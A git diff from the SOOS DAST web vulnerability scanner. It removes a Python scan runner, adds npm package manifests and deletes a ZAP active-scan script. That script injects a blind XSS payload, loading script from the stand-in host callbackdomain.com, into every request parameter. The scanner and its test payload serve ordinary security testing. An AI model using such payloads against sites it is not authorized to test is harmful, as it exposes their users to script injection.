-            "--apiScanFormat",
-            help="Target API format: OpenAPI, SOAP, or GraphQL",
-            required=False,
-        )
-        parser.add_argument(
-            "--level",
-            help="Log level to show: DEBUG, INFO, WARN, ERROR, CRITICAL",
-            default="INFO",
-            required=False,
-        )
-        parser.add_argument(
-            "--integrationName",
-            help="Integration Name - Intended for internal use only.",
-            type=str,
-            nargs="*",
-            required=False,
-        )
-        parser.add_argument(
-            "--integrationType",
-            help="Integration Type - Intended for internal use only.",
-            type=str,
-            nargs="*",
-            required=False,
-        )
-        parser.add_argument(
-            "--scriptVersion",
-            help="Script Version - Intended for internal use only.",
-            type=str,
-            nargs="*",
-            required=False,
-        )
-        parser.add_argument(
-            "--appVersion",
-            help="App Version - Intended for internal use only.",
-            type=str,
-            nargs="*",
-            required=False,
-        )
-        parser.add_argument(
-            "--authDisplay",
-            help="Minimum level to show: PASS, IGNORE, INFO, WARN or FAIL",
-            required=False,
-        )
-        parser.add_argument(
-            "--authUsername",
-            help="Username to use in auth apps",
-            required=False,
-        )
-        parser.add_argument(
-            "--authPassword",
-            help="Password to use in auth apps",
-            required=False,
-        )
-        parser.add_argument(
-            "--authLoginURL",
-            help="Login url to use in auth apps",
-            required=False,
-        )
-        parser.add_argument(
-            "--authUsernameField",
-            help="Username input id to use in auth apps",
-            required=False,
-        )
-        parser.add_argument(
-            "--authPasswordField",
-            help="Password input id to use in auth apps",
-            required=False,
-        )
-        parser.add_argument(
-            "--authSubmitField",
-            help="Submit button id to use in auth apps",
-            required=False,
-        )
-        parser.add_argument(
-            "--authSecondSubmitField",
-            help="Second submit button id to use in auth apps (for multi-page forms)",
-            required=False,
-        )
-        parser.add_argument(
-            "--authSubmitAction",
-            help="Submit action to perform on form filled. Options: click or submit",
-            type=str,
-            required=False,
-        )
-        parser.add_argument(
-            "--authFormType",
-            help="simple (all fields are displayed at once), wait_for_password (Password field is displayed only after username is filled), or multi_page (Password field is displayed only after username is filled and submit is clicked)",
-            type=str,
-            default="simple",
-            required=False,
-        )
-        parser.add_argument(
-            "--authDelayTime",
-            help="Delay time in seconds to wait for the page to load after performing actions in the form. (Used only on authFormType: wait_for_password and multi_page)",
-            default=Constants.AUTH_DELAY_TIME,
-            required=False,
-        )
-        parser.add_argument(
-            "--zapOptions",
-            help="Additional ZAP Options",
-            type=str,
-            nargs="*",
-            required=False,
-        )
-        parser.add_argument(
-            "--requestCookies",
-            help="Set Cookie values for the requests to the target URL",
-            type=str,
-            nargs="*",
-            default=None,
-            required=False,
-        )
-        parser.add_argument(
-            "--requestHeaders",
-            help="Set extra Header requests",
-            type=str,
-            nargs="*",
-            default=None,
-            required=False,
-        )
-        parser.add_argument(
-            "--onFailure",
-            help="Action to perform when the scan fails. Options: fail_the_build, continue_on_failure",
-            type=str,
-            default="continue_on_failure",
-            required=False,
-        )
-        parser.add_argument(
-            "--commitHash",
-            help="The commit hash value from the SCM System",
-            type=str,
-            default=None,
-            required=False,
-        )
-        parser.add_argument(
-            "--branchName",
-            help="The name of the branch from the SCM System",
-            type=str,
-            default=None,
-            nargs="*",
-            required=False,
-        )
-        parser.add_argument(
-            "--branchURI",
-            help="The URI to the branch from the SCM System",
-            default=None,
-            required=False,
-        )
-        parser.add_argument(
-            "--buildVersion",
-            help="Version of application build artifacts",
-            type=str,
-            default=None,
-            required=False,
-        )
-        parser.add_argument(
-            "--buildURI",
-            help="URI to CI build info",
-            type=str,
-            default=None,
-            required=False,
-        )
-        parser.add_argument(
-            "--operatingEnvironment",
-            help="Set Operating environment for information purposes only",
-            type=str,
-            default=None,
-            nargs="*",
-            required=False,
-        )
-        parser.add_argument(
-            "--reportRequestHeaders",
-            help="Include request/response headers data in report",
-            type=str,
-            default="True",
-            required=False
-        )
-        parser.add_argument(
-            "--outputFormat",
-            help="Output format for vulnerabilities: only the value SARIF is available at the moment",
-            type=str,
-            default=None,
-            required=False
-        )
-        parser.add_argument(
-            "--gpat",
-            help="GitHub Personal Authorization Token",
-            type=str,
-            default=None,
-            required=False
-        )
-        parser.add_argument(
-            "--bearerToken",
-            help="Bearer token to authenticate",
-            type=str,
-            default=None,
-            required=False
-        )
-        parser.add_argument(
-            "--checkoutDir",
-            help="Checkout directory to locate SARIF report",
-            type=str,
-            default=None,
-            required=False
-        )
-        parser.add_argument(
-            "--sarifDestination",
-            help="SARIF destination to upload report in the form of <repo_owner>/<repo_name>",
-            type=str,
-            default=None,
-            required=False
-        )
-        parser.add_argument(
-            "--sarif",
-            help="DEPRECATED - SARIF parameter is currently deprecated, please use --outputFormat='sarif' instead",
-            type=bool,
-            default=None,
-            required=False
-        )
-        parser.add_argument(
-            "--oauthTokenUrl",
-            help="The authentication URL that grants the access_token.",
-            type=str,
-            default=None,
-            required=False
-        )
-        parser.add_argument(
-            "--oauthParameters",
-            help="Parameters to be added to the oauth token request. (eg --oauthParameters=\"client_id:clientID, client_secret:clientSecret, grant_type:client_credentials\")",
-            type=str,
-            nargs="*",
-            default=None,
-            required=False,
-        )
-        parser.add_argument(
-            "--updateAddons",
-            help="Internal use only. Update addons of the zap image.",
-            type=str,
-            default="False",
-            required=False
-        )
-        parser.add_argument(
-            "--disableRules",
-            help="Comma separated list of ZAP rules IDs to disable. List for reference https://www.zaproxy.org/docs/alerts/",
-            nargs="*",
-            default=None,
-            required=False
-        )
-        parser.add_argument(
-            "--otherOptions",
-            help="Other command line arguments sent directly to the script for items not supported by other command line arguments",
-            type=str,
-            nargs="*",
-            required=False,
-        )
-
-        # parse help argument
-        if "-hf" in sys.argv or "--helpFormatted" in sys.argv:
-            self.print_help_formatted(parser)
-            sys.exit(0)
-        log("Parsing Arguments")
-        args: Namespace = parser.parse_args()
-        if args.configFile is not None:
-            log(f"Reading config file: {args.configFile}", log_level=LogLevel.DEBUG)
-            file = read_file(file_path=Constants.CONFIG_FILE_FOLDER + args.configFile)
-            configuration = yaml.load(file, Loader=yaml.FullLoader)
-            self.parse_configuration(configuration["config"], args.targetURL)
-        else:
-            self.parse_configuration(vars(args), args.targetURL)
-
-    def print_help_formatted(self, parser: ArgumentParser):
-        print("| Argument | Default | Description |")
-        print("| --- | --- | --- |")
-        all_rows = []
-        for arg, options in parser._option_string_actions.items():
-            default_value = options.default
-            description_text = options.help
-            all_rows.append(f"| `{'`, `'.join(options.option_strings)}` | {default_value} | {description_text} |")
-        # remove duplicates
-        for row in list(OrderedDict.fromkeys(all_rows)):
-            print(row)
-
-    def run_analysis(self) -> None:
-        try:
-            log("Starting SOOS DAST Analysis")
-            print_line_separator()
-
-            self.parse_args()
-
-            log("Configuration read")
-            print_line_separator()
-
-            log(f"Project Name: {self.project_name}")
-            log(f"Scan Mode: {self.scan_mode}")
-            log(f"API URL: {self.base_uri}")
-            log(f"Target URL: {self.target_url}")
-            print_line_separator()
-
-            if self.scan_mode != Constants.API_SCAN:
-                check: bool = check_site_is_available(self.target_url)
-
-                if check is False:
-                    exit_app(f"The URL {self.target_url} is not available")
-                    return None
-
-
-            scan_function = self.scan_mode_map.get(self.scan_mode, None)
-
-            if scan_function is None:
-                exit_app(f"The scan mode {self.scan_mode} is invalid.")
-                return None
-
-            log(f"Copying report templates. Include request headers: {self.report_request_headers}", log_level=LogLevel.DEBUG)
-            os.system("mkdir -p ~/.ZAP/reports")
-            os.system("mkdir -p /root/.ZAP/reports")
-            if self.report_request_headers is True:
-               os.system("cp -R /zap/reports/traditional-json-headers ~/.ZAP/reports/traditional-json")
-               os.system("cp -R /zap/reports/traditional-json-headers /root/.ZAP/reports/traditional-json")
-            else:
-               os.system("cp -R /zap/reports/traditional-json ~/.ZAP/reports/traditional-json")
-               os.system("cp -R /zap/reports/traditional-json /root/.ZAP/reports/traditional-json")
-
-            command: str = scan_function()
-                            
-            if self.update_addons:
-                command = f"{command} --updateAddons"
-
-            if self.zap_options:
-                command = f"{command} {Constants.ZAP_OPTIONS} \"{self.zap_options}\""
-
-            if self.other_options:
-                log(f"Other Options: {str(self.other_options)}")
-                command = f"{command} {self.other_options}"
-
-            log(f"Executing {self.scan_mode} scan")
-            soos_dast_start_response = self.__make_soos_start_analysis_request__(command)
-
-            self.__make_soos_scan_status_request__(project_id=soos_dast_start_response.project_id,
-                                                   branch_hash=soos_dast_start_response.branch_hash,
-                                                   analysis_id=soos_dast_start_response.analysis_id,
-                                                   status="Running",
-                                                   status_message=None
-                                                   )           
-            
-            log(f"Command to be executed: {command}", log_level=LogLevel.DEBUG)
-            os.system(command)
-
-            run_success = os.path.exists(Constants.REPORT_SCAN_RESULT_FILE)
-
-            print_line_separator()
-            if run_success is False:
-                self.__make_soos_scan_status_request__(project_id=soos_dast_start_response.project_id,
-                                                       branch_hash=soos_dast_start_response.branch_hash,
-                                                       analysis_id=soos_dast_start_response.analysis_id,
-                                                       status="Error",
-                                                       status_message=f"An Unexpected error has occurred running the {self.scan_mode} scan"
-                                                       )
-                raise Exception(f"An Unexpected error has occurred running the {self.scan_mode} scan")
-
-            # Add the discovered urls to the report
-            discoveredUrls = []
-            if (os.path.isfile('./spidered_urls.txt')):
-                discoveredUrls = open('./spidered_urls.txt', 'r').read().splitlines()
-            data = json.load(open(Constants.REPORT_SCAN_RESULT_FILE, 'r'))
-            data['discoveredUrls'] = discoveredUrls
-            json.dump(data, open(Constants.REPORT_SCAN_RESULT_FILE, 'w'))
-
-            self.publish_results_to_soos(
-                project_id=soos_dast_start_response.project_id,
-                branch_hash=soos_dast_start_response.branch_hash,
-                analysis_id=soos_dast_start_response.analysis_id,
-                report_url=soos_dast_start_response.scan_url,
-            )
-
-            if self.output_format == "sarif":
-                SOOSSARIFReport.exec(analysis=self,
-                                     project_hash=soos_dast_start_response.project_id,
-                                     branch_hash=soos_dast_start_response.branch_hash,
-                                     scan_id=soos_dast_start_response.analysis_id)
-
-
-            while True and self.on_failure == Constants.FAIL_THE_BUILD:
-                if (datetime.utcnow() - datetime.strptime(ANALYSIS_START_TIME, "%Y-%m-%dT%H:%M:%SZ")).seconds > ANALYSIS_RESULT_MAX_WAIT:
-                    log(f"Analysis Result Max Wait Time Reached ({str(ANALYSIS_RESULT_MAX_WAIT)})")
-                    sys.exit(1)
-
-                analysis_result_api_response = self.get_analysis_status_soos(result_uri=soos_dast_start_response.scan_status_url)
-
-                content_object = analysis_result_api_response.json()
-
-                if analysis_result_api_response.status_code < 299:
-                    analysis_status = str(content_object["status"]) if content_object and "status" in content_object else None
-
-                    if analysis_status.lower().startswith("failed") and self.on_failure:
-                        log("Analysis complete - Failures reported")
-                        log("Failing the build.")
-                        sys.exit(1)
-                    elif analysis_status.lower() == "incomplete":
-                        log("Analysis Incomplete. It may have been cancelled or superseded by another scan.")
-                        log("Failing the build.")
-                        sys.exit(1)
-                    elif analysis_status.lower() == "error":
-                        log("Analysis Error.")
-                        log("Failing the build.")
-                        sys.exit(1)
-                    elif analysis_status.lower() == "finished":
-                        return
-                    else:
-                    # Status code that is not pertinent to the result
-                        log(f"Analysis Ongoing. Will retry in {str(ANALYSIS_RESULT_POLLING_INTERVAL)} seconds.")
-                        time.sleep(ANALYSIS_RESULT_POLLING_INTERVAL)
-                        continue
-                else:
-                    if "message" in analysis_result_api_response.json():
-                        results_error_code = analysis_result_api_response.json()["code"]
-                        results_error_message = analysis_result_api_response.json()["message"]
-                        log(f"Analysis Results API Status Code: {str(results_error_code)},{results_error_message}")
-                        sys.exit(1)
-
-
-
-            sys.exit(0)
-
-        except Exception as error:
-            exit_app(error)
-
-
-class SOOSSARIFReport:
-
-    URL_TEMPLATE = '{soos_base_uri}clients/{clientHash}/projects/{projectHash}/branches/{branchHash}/scan-types/dast/scans/{scanId}/formats/sarif'
-    GITHUB_URL_TEMPLATE = 'https://api.github.com/repos/{sarif_destination}/code-scanning/sarifs'
-
-    errors_dict = {
-        400: "Github: The sarif report is invalid",
-        403: "Github: The repository is archived or if github advanced security is not enabled for this repository",
-        404: "Github: Resource not found",
-        413: "Github: The sarif report is too large",
-        503: "Github: Service Unavailable"
-    }
-
-    def __init__(self):
-        pass
-
-    @staticmethod
-    def generate_soos_sarif_url(base_uri: str, client_id: str, project_hash: str, branch_hash: str,
-                                scan_id: str) -> str:
-        return SOOSSARIFReport.URL_TEMPLATE.format(soos_base_uri=base_uri,
-                                                   clientHash=client_id,
-                                                   projectHash=project_hash,
-                                                   branchHash=branch_hash,
-                                                   scanId=scan_id)
-
-    @staticmethod
-    def generate_github_sarif_url(sarif_destination: str) -> str:
-        return SOOSSARIFReport.GITHUB_URL_TEMPLATE.format(sarif_destination=sarif_destination)
-
-    @staticmethod
-    def exec(analysis: SOOSDASTAnalysis, project_hash: str, branch_hash: str,
-             scan_id: str) -> NoReturn:
-        try:
-            url = SOOSSARIFReport.generate_soos_sarif_url(base_uri=analysis.base_uri,
-                                                          client_id=analysis.client_id,
-                                                          project_hash=project_hash,
-                                                          branch_hash=branch_hash,
-                                                          scan_id=scan_id)
-
-            headers = generate_header(api_key=analysis.api_key, content_type="application/json")
-            sarif_json_response = None
-
-            api_response: requests.Response = requests.get(url=url, headers=headers)
-            sarif_json_response = handle_response(api_response)
-            if type(sarif_json_response) is ErrorAPIResponse:
-                error_message = "A Generate SARIF Report API Exception Occurred."
-                log(f"{error_message}\n{sarif_json_response.code}-{sarif_json_response.message}")
-            else:
-                log("SARIF Report")
-                log(json.dumps(sarif_json_response, indent=2))
-
-            if sarif_json_response is None:
-                log("This project contains no issues. There will be no SARIF upload.")
-                return
-            if analysis.github_pat is not None:
-                sarif_report_str = json.dumps(sarif_json_response)
-                compressed_sarif_response = base64.b64encode(gzip.compress(bytes(sarif_report_str, 'UTF-8')))
-
-                github_body_request = {
-                    "commit_sha": analysis.commit_hash,
-                    "ref": analysis.branch_name,
-                    "sarif": compressed_sarif_response.decode(encoding='UTF-8'),
-                    "started_at": ANALYSIS_START_TIME,
-                    "tool_name": "SOOS DAST"
-                }
-
-                github_sarif_url = SOOSSARIFReport.generate_github_sarif_url(sarif_destination=analysis.sarif_destination)
-                headers = {"Accept": "application/vnd.github.v3+json", "Authorization": f"token {analysis.github_pat}"}
-
-                log(f"GitHub SARIF URL: {github_sarif_url}")
-                log(f"GitHub SARIF Header: {str(headers)}")
-                log(f"GitHub SARIF Body Request")
-                log(str(json.dumps(github_body_request)))
-                log("Uploading SARIF Response")
-                sarif_github_response = requests.post(url=github_sarif_url, data=json.dumps(github_body_request),
-                                                      headers=headers)
-
-                if sarif_github_response.status_code >= 400:
-                    SOOSSARIFReport.handle_github_sarif_error(status=sarif_github_response.status_code,
-                                                              json_response=sarif_github_response.json())
-                else:
-                    sarif_github_json_response = sarif_github_response.json()
-                    sarif_url = sarif_github_json_response["url"]
-                    sarif_github_status_response = requests.get(url=sarif_url,
-                                                                headers=headers)
-
-                    if sarif_github_status_response.status_code >= 400:
-                        SOOSSARIFReport.handle_github_sarif_error(status=sarif_github_status_response.status_code,
-                                                                  json_response=sarif_github_status_response.json())
-                    else:
-                        status_json_response = sarif_github_status_response.json()
-                        processing_status = status_json_response["processing_status"]
-                        log("SARIF Report uploaded to GitHub")
-                        log(f"Processing Status: {processing_status}")
-            if analysis.checkout_dir is not None:
-                log("Writing sarif file")
-                sarif_file = open(os.path.join(analysis.checkout_dir, "results.sarif"), "w")
-                sarif_file.write(json.dumps(sarif_json_response))
-                sarif_file.close()
-
-
-        except Exception as sarif_exception:
-            log(f"ERROR: {str(sarif_exception)}")
-
-    @staticmethod
-    def handle_github_sarif_error(status, json_response):
-
-        error_message = json_response["message"] if json_response is not None and json_response[
-            "message"] is not None else SOOSSARIFReport.errors_dict[status]
-        if error_message is None:
-            error_message = "An unexpected error has occurred uploading the sarif report to GitHub"
-
-        log(f"ERROR: {error_message}")
-
-
-if __name__ == "__main__":
-    dastAnalysis = SOOSDASTAnalysis()
-    dastAnalysis.run_analysis()
diff --git a/package-lock.json b/package-lock.json
new file mode 100644
index 0000000..2cb3c24
--- /dev/null
+++ b/package-lock.json
@@ -0,0 +1,221 @@
+{
+  "name": "soos-dast",
+  "version": "1.0.0",
+  "lockfileVersion": 3,
+  "requires": true,
+  "packages": {
+    "": {
+      "name": "soos-dast",
+      "version": "1.0.0",
+      "license": "MIT",
+      "dependencies": {
+        "@soos-io/api-client": "0.1.5-pre.3",
+        "argparse": "^2.0.1",
+        "axios": "^0.27.2",
+        "tslib": "^2.6.2",
+        "zaproxy": "^2.0.0-rc.3"
+      },
+      "devDependencies": {
+        "@types/argparse": "^2.0.11",
+        "@types/glob": "^8.1.0",
+        "@types/node": "^20.6.3",
+        "prettier": "^2.8.8",
+        "typescript": "^5.2.2"
+      }
+    },
+    "node_modules/@soos-io/api-client": {
+      "version": "0.1.5-pre.3",
+      "resolved": "https://registry.npmjs.org/@soos-io/api-client/-/api-client-0.1.5-pre.3.tgz",
+      "integrity": "sha512-cTaszKtEquP3pfCb42jKr0HGFS6w0s8afbweAG2hcediWt3SBU3PELP7BMfTgBVITxCYvNukhqBPdSuUowqQKQ==",
+      "dependencies": {
+        "axios": "^0.27.2",
+        "tslib": "^2.6.2"
+      }
+    },
+    "node_modules/@types/argparse": {
+      "version": "2.0.12",
+      "resolved": "https://registry.npmjs.org/@types/argparse/-/argparse-2.0.12.tgz",
+      "integrity": "sha512-Qt/6lHaSI+idkJKKTixUTm6q1yjm7EE6ZpsKLkJIHQl7NLAX7lMZRFGAEU8kxaWur3N6L2UE7/U7QR46Isi3vg==",
+      "dev": true
+    },
+    "node_modules/@types/glob": {
+      "version": "8.1.0",
+      "resolved": "https://registry.npmjs.org/@types/glob/-/glob-8.1.0.tgz",
+      "integrity": "sha512-IO+MJPVhoqz+28h1qLAcBEH2+xHMK6MTyHJc7MTnnYb6wsoLR29POVGJ7LycmVXIqyy/4/2ShP5sUwTXuOwb/w==",
+      "dev": true,
+      "dependencies": {
+        "@types/minimatch": "^5.1.2",
+        "@types/node": "*"
+      }
+    },
+    "node_modules/@types/minimatch": {
+      "version": "5.1.2",
+      "resolved": "https://registry.npmjs.org/@types/minimatch/-/minimatch-5.1.2.tgz",
+      "integrity": "sha512-K0VQKziLUWkVKiRVrx4a40iPaxTUefQmjtkQofBkYRcoaaL/8rhwDWww9qWbrgicNOgnpIsMxyNIUM4+n6dUIA==",
+      "dev": true
+    },
+    "node_modules/@types/node": {
+      "version": "20.8.9",
+      "resolved": "https://registry.npmjs.org/@types/node/-/node-20.8.9.tgz",
+      "integrity": "sha512-UzykFsT3FhHb1h7yD4CA4YhBHq545JC0YnEz41xkipN88eKQtL6rSgocL5tbAP6Ola9Izm/Aw4Ora8He4x0BHg==",
+      "dev": true,
+      "dependencies": {
+        "undici-types": "~5.26.4"
+      }
+    },
+    "node_modules/argparse": {
+      "version": "2.0.1",
+      "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz",
+      "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q=="
+    },
+    "node_modules/asynckit": {
+      "version": "0.4.0",
+      "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz",
+      "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q=="
+    },
+    "node_modules/axios": {
+      "version": "0.27.2",
+      "resolved": "https://registry.npmjs.org/axios/-/axios-0.27.2.tgz",
+      "integrity": "sha512-t+yRIyySRTp/wua5xEr+z1q60QmLq8ABsS5O9Me1AsE5dfKqgnCFzwiCZZ/cGNd1lq4/7akDWMxdhVlucjmnOQ==",
+      "dependencies": {
+        "follow-redirects": "^1.14.9",
+        "form-data": "^4.0.0"
+      }
+    },
+    "node_modules/combined-stream": {
+      "version": "1.0.8",
+      "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz",
+      "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==",
+      "dependencies": {
+        "delayed-stream": "~1.0.0"
+      },
+      "engines": {
+        "node": ">= 0.8"
+      }
+    },
+    "node_modules/delayed-stream": {
+      "version": "1.0.0",
+      "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz",
+      "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==",
+      "engines": {
+        "node": ">=0.4.0"
+      }
+    },
+    "node_modules/follow-redirects": {
+      "version": "1.15.3",
+      "resolved": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.15.3.tgz",
+      "integrity": "sha512-1VzOtuEM8pC9SFU1E+8KfTjZyMztRsgEfwQl44z8A25uy13jSzTj6dyK2Df52iV0vgHCfBwLhDWevLn95w5v6Q==",
+      "funding": [
+        {
+          "type": "individual",
+          "url": "https://github.com/sponsors/RubenVerborgh"
+        }
+      ],
+      "engines": {
+        "node": ">=4.0"
+      },
+      "peerDependenciesMeta": {
+        "debug": {
+          "optional": true
+        }
+      }
+    },
+    "node_modules/form-data": {
+      "version": "4.0.0",
+      "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.0.tgz",
+      "integrity": "sha512-ETEklSGi5t0QMZuiXoA/Q6vcnxcLQP5vdugSpuAyi6SVGi2clPPp+xgEhuMaHC+zGgn31Kd235W35f7Hykkaww==",
+      "dependencies": {
+        "asynckit": "^0.4.0",
+        "combined-stream": "^1.0.8",
+        "mime-types": "^2.1.12"
+      },
+      "engines": {
+        "node": ">= 6"
+      }
+    },
+    "node_modules/mime-db": {
+      "version": "1.52.0",
+      "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz",
+      "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==",
+      "engines": {
+        "node": ">= 0.6"
+      }
+    },
+    "node_modules/mime-types": {
+      "version": "2.1.35",
+      "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz",
+      "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==",
+      "dependencies": {
+        "mime-db": "1.52.0"
+      },
+      "engines": {
+        "node": ">= 0.6"
+      }
+    },
+    "node_modules/prettier": {
+      "version": "2.8.8",
+      "resolved": "https://registry.npmjs.org/prettier/-/prettier-2.8.8.tgz",
+      "integrity": "sha512-tdN8qQGvNjw4CHbY+XXk0JgCXn9QiF21a55rBe5LJAU+kDyC4WQn4+awm2Xfk2lQMk5fKup9XgzTZtGkjBdP9Q==",
+      "dev": true,
+      "bin": {
+        "prettier": "bin-prettier.js"
+      },
+      "engines": {
+        "node": ">=10.13.0"
+      },
+      "funding": {
+        "url": "https://github.com/prettier/prettier?sponsor=1"
+      }
+    },
+    "node_modules/proxy-from-env": {
+      "version": "1.1.0",
+      "resolved": "https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-1.1.0.tgz",
+      "integrity": "sha512-D+zkORCbA9f1tdWRK0RaCR3GPv50cMxcrz4X8k5LTSUD1Dkw47mKJEZQNunItRTkWwgtaUSo1RVFRIG9ZXiFYg=="
+    },
+    "node_modules/tslib": {
+      "version": "2.6.2",
+      "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.6.2.tgz",
+      "integrity": "sha512-AEYxH93jGFPn/a2iVAwW87VuUIkR1FVUKB77NwMF7nBTDkDrrT/Hpt/IrCJ0QXhW27jTBDcf5ZY7w6RiqTMw2Q=="
+    },
+    "node_modules/typescript": {
+      "version": "5.2.2",
+      "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.2.2.tgz",
+      "integrity": "sha512-mI4WrpHsbCIcwT9cF4FZvr80QUeKvsUsUvKDoR+X/7XHQH98xYD8YHZg7ANtz2GtZt/CBq2QJ0thkGJMHfqc1w==",
+      "dev": true,
+      "bin": {
+        "tsc": "bin/tsc",
+        "tsserver": "bin/tsserver"
+      },
+      "engines": {
+        "node": ">=14.17"
+      }
+    },
+    "node_modules/undici-types": {
+      "version": "5.26.5",
+      "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-5.26.5.tgz",
+      "integrity": "sha512-JlCMO+ehdEIKqlFxk6IfVoAUVmgz7cU7zD/h9XZ0qzeosSHmUJVOzSQvvYSYWXkFXC+IfLKSIffhv0sVZup6pA==",
+      "dev": true
+    },
+    "node_modules/zaproxy": {
+      "version": "2.0.0-rc.3",
+      "resolved": "https://registry.npmjs.org/zaproxy/-/zaproxy-2.0.0-rc.3.tgz",
+      "integrity": "sha512-85oymfCSGMy+QG945IgUvwxCLrs24Dci6vMLCcUtldxNEAc87lHhDO7TVfh0cZZ6y5J5ID6bdzt6Yd1QbJk8rA==",
+      "dependencies": {
+        "axios": "^1.3.3"
+      },
+      "engines": {
+        "node": ">=17.0.0"
+      }
+    },
+    "node_modules/zaproxy/node_modules/axios": {
+      "version": "1.5.1",
+      "resolved": "https://registry.npmjs.org/axios/-/axios-1.5.1.tgz",
+      "integrity": "sha512-Q28iYCWzNHjAm+yEAot5QaAMxhMghWLFVf7rRdwhUI+c2jix2DUXjAHXVi+s1ibs3mjPO/cCgbA++3BjD0vP/A==",
+      "dependencies": {
+        "follow-redirects": "^1.15.0",
+        "form-data": "^4.0.0",
+        "proxy-from-env": "^1.1.0"
+      }
+    }
+  }
+}
diff --git a/package.json b/package.json
new file mode 100644
index 0000000..4557d2e
--- /dev/null
+++ b/package.json
@@ -0,0 +1,43 @@
+{
+  "name": "soos-dast",
+  "version": "1.0.0",
+  "description": "SOOS DAST - The affordable no limit web vulnerability scanner",
+  "main": "index.js",
+  "scripts": {
+    "setup:install": "npm install",
+    "setup:clean-install": "npm ci",
+    "setup:update": "npx npm-check -u",
+    "setup:clean": "npx rimraf node_modules && npx rimraf package-lock.json",
+    "build": "tsc",
+    "build:clean": "npx rimraf build",
+    "format": "prettier ./src --check",
+    "format:fix": "prettier ./src --write",
+    "typecheck": "tsc --noEmit",
+    "test:coverage": "npm run test -- --reporter xunit --reporter-option output=ResultsFile.xml",
+    "check": "npm run format && npm run typecheck && npm run test"
+  },
+  "dependencies": {
+    "@soos-io/api-client": "0.1.5-pre.4",
+    "argparse": "^2.0.1",
+    "axios": "^0.27.2",
+    "tslib": "^2.6.2",
+    "zaproxy": "^2.0.0-rc.3"
+  },
+  "devDependencies": {
+    "@types/argparse": "^2.0.11",
+    "@types/glob": "^8.1.0",
+    "@types/node": "^20.6.3",
+    "prettier": "^2.8.8",
+    "typescript": "^5.2.2"
+  },
+  "repository": {
+    "type": "git",
+    "url": "git+https://github.com/soos-io/soos-dast.git"
+  },
+  "author": "SOOS",
+  "license": "MIT",
+  "bugs": {
+    "url": "https://github.com/soos-io/soos-dast/issues"
+  },
+  "homepage": "https://github.com/soos-io/soos-dast#readme"
+}
diff --git a/scripts/blindxss.js b/scripts/blindxss.js
deleted file mode 100644
index 32aca73..0000000
--- a/scripts/blindxss.js
+++ /dev/null
@@ -1,74 +0,0 @@
-// An example active scan rule script which uses a set of attack payloads and a set of regexes
-// in order to find potential issues.
-// Replace or extend the attacks and evidence regexes with you own values.
-
-// Note that new active scripts will initially be disabled
-// Right click the script in the Scripts tree and select "enable"  
-
-// Replace or extend these with your own attacks
-// put the attacks you most want to run higher, unless you disable the attack strength check
-var attacks = [
-	'"><script src=//callbackdomain.com></script>',
-	//'"><script src=//callbackdomain.com>',
-]
-
-/**
- * Scans a "node", i.e. an individual entry in the Sites Tree.
- * The scanNode function will typically be called once for every page. 
- * 
- * @param as - the ActiveScan parent object that will do all the core interface tasks 
- *     (i.e.: sending and receiving messages, providing access to Strength and Threshold settings,
- *     raising alerts, etc.). This is an ScriptsActiveScanner object.
- * @param msg - the HTTP Message being scanned. This is an HttpMessage object.
- */
-function scanNode(as, msg) {
-	// Do nothing here - this script just attacks parameters rather than nodes
-}
-
-/**
- * Scans a specific parameter in an HTTP message.
- * The scan function will typically be called for every parameter in every URL and Form for every page.
- * 
- * @param as - the ActiveScan parent object that will do all the core interface tasks 
- *     (i.e.: sending and receiving messages, providing access to Strength and Threshold settings,
- *     raising alerts, etc.). This is an ScriptsActiveScanner object.
- * @param msg - the HTTP Message being scanned. This is an HttpMessage object.
- * @param {string} param - the name of the parameter being manipulated for this test/scan.
- * @param {string} value - the original parameter value.
- */
-function scan(as, msg, param, value) {
-	// Debugging can be done using print like this
-	//print('scan called for url=' + msg.getRequestHeader().getURI().toString() + 
-	//	' param=' + param + ' value=' + value);
-	
-	var max_attacks = attacks.length	// No limit for the "INSANE" level ;)
-	
-	if (as.getAttackStrength() == "LOW") {
-		max_attacks = 6
-	} else if (as.getAttackStrength() == "MEDIUM") {
-		max_attacks = 12
-	} else if (as.getAttackStrength() == "HIGH") {
-		max_attacks = 24
-	}
-
-	for (var i in attacks) {
-		// Dont exceed recommended number of attacks for strength
-		// feel free to disable this locally ;)
-		if (i > max_attacks) {
-			return
-		}
-		// Copy requests before reusing them
-		msg = msg.cloneRequest();
-
-		// setParam (message, parameterName, newValue)
-		as.setParam(msg, param, attacks[i]);
-		
-		// sendAndReceive(msg, followRedirect, handleAntiCSRFtoken)
-		as.sendAndReceive(msg, false, false);
-
-		// Check if the scan was stopped before performing lengthy tasks
-		if (as.isStop()) {
-			return
-		}
-	}
-}
diff --git a/scripts/httpsender/request_cookies.js b/scripts/httpsender/request_cookies.js
deleted file mode 100644
index ac6be24..0000000
